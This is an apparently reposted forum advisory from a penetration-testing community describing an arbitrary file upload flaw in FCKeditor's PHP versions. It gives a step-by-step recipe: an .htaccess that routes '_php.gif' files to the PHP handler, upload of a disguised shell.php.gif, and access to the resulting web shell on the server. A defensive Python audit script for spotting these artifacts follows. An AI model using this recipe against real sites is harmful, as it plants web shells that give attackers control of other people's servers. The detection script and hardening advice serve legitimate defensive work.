China Network Penetration Testing Alliance

Title: Upload vulnerability in all PHP versions of FCKeditor

Author: admin    Time: 2013-10-27 17:25
Author: Anonymous    Source: compiled by this site    Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After upload shell.php.gif, the name "shell.php.gif" changes to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now shell is available from server.
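
For defenders, the two artifacts this post relies on (an uploaded .htaccess that remaps a handler to PHP, and an image-named file with a hidden script extension) can be found by auditing the upload directory. The following is an added example, not part of the original post; the reason labels, the extension lists and the constructed sample tree are assumptions for illustration.

```python
import os
import re
import tempfile

# Directives that let a per-directory .htaccess send files to the PHP handler.
HANDLER_RE = re.compile(r'^\s*(SetHandler|AddHandler|AddType)\b.*php', re.I)
# Names such as shell_php.gif or shell.php.gif: script extension before an image one.
DISGUISED_RE = re.compile(r'[._](php\d?|phtml|phar)\.(gif|jpe?g|png)$', re.I)


def audit_upload_dir(root):
    """Return sorted (relative_path, reason) findings under an upload directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.lower() == ".htaccess":
                # Any .htaccess inside a user-writable upload tree is suspect.
                findings.append((rel, "htaccess-in-upload-dir"))
                with open(full, errors="replace") as fh:
                    if any(HANDLER_RE.match(line) for line in fh):
                        findings.append((rel, "php-handler-override"))
            elif DISGUISED_RE.search(name):
                findings.append((rel, "disguised-script-name"))
    return sorted(findings)


def demo():
    """Audit a constructed upload tree that mirrors the file names in the post."""
    with tempfile.TemporaryDirectory() as root:
        samples = {  # constructed sample content, placeholders only
            ".htaccess": '<FilesMatch "_php.gif">\n'
                         'SetHandler application/x-httpd-php\n'
                         '</FilesMatch>\n',
            "shell_php.gif": "GIF89a placeholder\n",
            "photo.gif": "GIF89a placeholder\n",
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return audit_upload_dir(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:26} {rel}")
```

Setting `AllowOverride None` for the upload directory in the main Apache configuration makes an uploaded .htaccess inert, so a finding there indicates an attempt rather than a working override.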
